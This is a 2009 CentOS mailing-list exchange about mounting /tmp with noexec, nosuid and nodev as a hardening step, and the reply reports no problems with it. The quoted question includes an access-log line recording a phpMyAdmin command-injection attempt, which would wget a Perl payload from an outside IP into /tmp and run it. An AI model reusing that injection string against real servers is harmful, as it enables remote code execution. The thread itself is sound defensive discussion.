[CentOS] Mounting /tmp nosuid,noexec

Mon Aug 24 19:52:41 UTC 2009
Lucian @ lastdot.org <lucian at lastdot.org>

On Mon, Aug 24, 2009 at 2:04 PM, Chuck<chuck.carson at gmail.com> wrote:
>
> Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in
> solaris land forever and a day and this is a pretty standard security
> measure. I noticed CentOS comes default mounting /tmp with both those
> options allowed.. I'm getting constant php hack attacks against (mostly
> script kiddie level stuff right now) my server and will rest much easier
> with this setting in place.. We've been evaluating numerous wiki products
> which are certain to have security holes as well as pypmyadmin... Seeing a
> lot of crap like this:
>
> 193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET
> /phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix
> HTTP/1.1" 404 230
>
> (of course I use cryptic names for my phpmyadmin install directory as well
> as password protect the directory and make any sensitive config files
> readable only by the web server owner)
>
> Thx for any info
> rhugga
>
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
>

I've been doing this for a lot of time without issues.
noexec,nosuid,nodev ftw! :)